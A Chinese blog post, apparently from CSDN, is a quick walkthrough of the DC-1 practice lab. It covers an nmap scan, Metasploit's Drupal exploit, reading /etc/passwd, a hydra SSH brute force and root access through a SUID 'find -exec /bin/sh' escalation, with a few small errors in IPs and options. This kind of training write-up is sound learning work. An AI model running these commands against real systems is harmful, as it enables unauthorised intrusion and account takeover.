【靶机DC-1】

最新推荐文章于 2024-08-30 14:11:28 发布
最新推荐文章于 2024-08-30 14:11:28 发布
阅读量50 收藏
点赞数
分类专栏: 靶场合集 文章标签: linux 安全 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52108338/article/details/132405819
版权

PS:快速通关,没有找flag,只获取了root权限

        kali和dc1都使用net模式

        kali的ip:192.168.219.129

        靶机的ip:192.168.219.145

1.扫描网段

进行快速半开扫描,靶机一般是开启了80,22端口的。

nmap -sS -T4 192.168.219.0/24

 2.查看ip的80端口内容

使用火狐浏览器的Wappalyzer工具可以直接看到内核,操作系统和编程语言。(没有火狐的可以直接看网页最下面也提示了drupal)

 3.使用msfconsole

msfconsole        //启动


search drupal        //搜索drupal的漏洞

 

 

4.漏洞利用

use 1        //使用第二个漏洞(从0开始排列所以第二个的编号是1)
options        //查看详细信息,发现只有对方主机ip没有设置
set lhosts 192.168.219.145        //设置ip
run        //检查无误后运行

 5.查看passwd发现一个名为flag4的用户,可以尝试密码爆破

shell        //打开shell
python -c "import pty;pty.spawn('/bin/bash')"        //开启交互(需要有python环境)

cat /etc/passwd        //查看敏感目录

 

 

6.使用hydra爆破ssh连接密码,爆破出密码为orange

hydra -l flag4 -P top1000.txt ssh://192.168.219.145

 

7.使用ssh连接,寻找拥有suid权限的文件

ssh flag4@192.168.129.145
输入密码:orange

find / -perm -4000 -type f 2>/dev/null        //寻找拥有suid权限的普通文件并将错误重定向到null

 

8.提权,查看find命令的suid权限是root的,可以使用find提权

ls -l /usr/bin/find

find / -exec "/bin/sh" \;

获取到root权限就想干嘛就干嘛了,剩下的flag在网页,数据库里的可以自己找找啦

zkzkz&
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
vulnhub靶机DC-1
cyzCc的博客
02-15 938
1.启动DC1靶机发现没有登录密码 2.信息收集 主机发现,由于是与主机nat连接,所以需要找到dc1的IP地址 dc1的Mac地址是 nmap -sP 192.168.211.0/24 所以dc1 靶机的ip地址是192.168.211.133 扫描主机上开启的服务 nmap -A 192.168.211.133 -p 1-65535 发现目标开启了22端口和80端口 22端口考虑ssh...
靶机DC-8(详细渗透,适合新手渗透)
热门推荐
君莫hacker的博客
09-05 1万+
目录靶机DC-8 (详细渗透,适合新手渗透)0x01靶机描述0x02环境搭建1. 下载并导入靶机2. 查看网络适配器3. 启动靶机0x03靶机渗透一、 信息收集1. 主机发现2. 端口扫描3. 详细扫描4. 目录扫描5. gobuster目录扫描6. 网站指纹识别二、 漏洞挖掘手工sql注入1. 通过手工验证,此处url含有sql注入漏洞2. 判断字段数3. 判断显示位置4. 查看当前数据库5. 查找库d7db中所有的表6. 查找uesrs表中所有的列7. 查询表中的数据sqlmap自动化执行1. 查当前数
渗透测试-靶机DC-1-知识点总结
qq_38678845的博客
01-11 2752
渗透测试靶机DC-1的知识点总结
靶机DC-1攻略
weixin_43179779的博客
10-07 1143
dc-1靶机靶机攻略
靶机DC-1 WP
m0_66638011的博客
05-11 1753
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。
靶机 DC-1
m0_66299232的博客
09-09 172
6:根据配置文件提示找到Flag2并发现数据库连接账号密码,根据提示需要提升权限访问敏感文件或者进行爆破账户,在此现在已有信息数据库下手。5:Drupal的默认配置文件为/var/www/sites/default/settings.php并查看。1:根据提示-exec,可能会是SUID提权,在此使用find命令查找suid权限的可执行二进制程序。3:查找敏感文件/etc/passwd发现存在Flag4用户,并使用hydra进行爆破。8:登录网站,搜索发现Flag3,并根据提示需要进行SUID提权。
渗透测试学习之靶机DC-1
xdbzdgx的博客
11-05 2787
1.下载安装靶机 下载链接为DC: 1 ~ VulnHub,里面有三种下载方式任选一种即可,下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,依照指示重试即可成功,如果仍无法成功可百度、谷歌解决。 在VMware加载成功之后显示如下界面: 默认状态我们是打不开该系统的,也不知道账号密码的,毕竟我们的目的就是在不知道账号密码的情况下拿到root权限,找到flag。 注意,这里建议把DC-1靶机的网络链接模式改为NAT模式。 本文使用的攻击机为kali(安装在VMwa.
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
靶机实战-DC-6
滕财然的博客
03-03 809
DC-6靶机实战 文章目录DC-6靶机实战1、主机发现2、端口及端口详细信息扫描3、老规矩,访问web服务(80端口)4、提权 1、主机发现 2、端口及端口详细信息扫描 开放22、80端口 3、老规矩,访问web服务(80端口) 输入IP之后会变成http://wordy且找不到此网站 和以前一样,添加到hosts文件中//物理机和kali都添加 重新访问://这里我用的是火狐的一款插件...
dc-1靶机实战详情(新手)
kyp_1994的博客
08-28 1114
dc-1靶机详细获取flag过程新手勿喷
Linux中的常见命令——用户管理命令
qq_45569925的博客
08-27 1012
默认创建用户的时候会在home文件夹下创建一个与用户同名的文件夹【该用户的主目录】,也可以在创建用户的时候设置该用户主目录的名称。【输入的密码是不在控制台显示的,输入完之后直接按回车键即可】使用wgh用户查看root下的文件。【此时的用户是没有密码的】给创建的用户设置密码。查看某个用户是否存在。
Linux基础知识(一、什么是Linux
心寒的博客
08-26 1607
什么是Linux Linux创始人
linux 系统如何进行nfs(第五节)
最新发布
weixin_44767571的博客
08-30 104
首先是 在虚拟机中的操作。然后是在开发板上的操作。
RockPI 4A单板Linux 4.4内核下的RK3399 GPIO功能解析
m0_67544708的博客
08-26 1186
在GPIO方面,RK3399提供了多达16个GPIO控制器,每个控制器可配置的GPIO引脚数量不等。通过详细的代码解析和示例,帮助读者理解如何在Linux内核中使用GPIO,以及如何通过GPIO实现单板的基本控制和功能扩展。为了更好地理解如何在Linux内核中使用RK3399的GPIO功能,下面是一个简单的示例代码,展示了如何通过GPIO控制LED灯的亮灭。函数,用于设置GPIO引脚的方向。在设置GPIO引脚方向为输出模式后,可以设置GPIO引脚的值。在获取GPIO引脚后,可以设置GPIO引脚的方向。
Linux——进程管理
m0_67677309的博客
08-29 929
1、通过fork创建的子进程会拷贝父进程(数据段、bss段、堆、栈、I/O缓冲区),与父进程共享代码段、子进程会继承父进程的信号处理方式。ITIMER_VIRTUAL 虚拟计时器 用户态的计时SIGVTALRM(26)**使用的时候要对应。ITIMER_REAL 真实计时器 程序总的计时时间SIGALRM(14)void (*sa_restorer)(void);// 第一次产生时钟信号的时间 **3秒钟一次,每个两秒。
Linux报错:make[2]: *** No rule to make target ‘/usr/local/lib/libopus.a‘
VIFIN的博客
08-27 569
解决报错:make[2]: *** No rule to make target '/usr/local/lib/libopus.a'
等保-Linux等保测评
2301_82000839的博客
08-26 546
等保-Linux等保测评
Linux下UDP编程
热土程序园,利他愉己~
08-28 1058
Linux下UDP编程 socket(套接字)本质上是一个抽象的概念,它是一组用于网络通信的 API,提供了一种统一的接口,使得应用程序可以通过网络进行通信。在不同的操作系统中,socket 的实现方式可能不同,但它们都遵循相同的规范和协议,可以实现跨平台的网络通信。
Linux篇】网络请求和下载与端口
2301_80912559的博客
08-26 1300
如图,计算机A的微信连接计算机B的微信,A使用的50001即动态端口,临时找一个端口作为出口。计算机B的微信使用端口5678,即注册端口,长期绑定此端口等待别人连接。在win系统中,可以通过任务管理器选择进程后,点击结束进程从而关闭。IP地址相当于小区地址,在小区内可以有很多住户(程序)而门牌号(端口)就是各个住户(程序)的联系地址。为管理运行的程序,每一个程序在运行的时候,便被操作系统注册为系统中的一个进程。计算机程序之间的通讯,通过IP只能锁定计算机,但是无法锁定具体的程序。
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值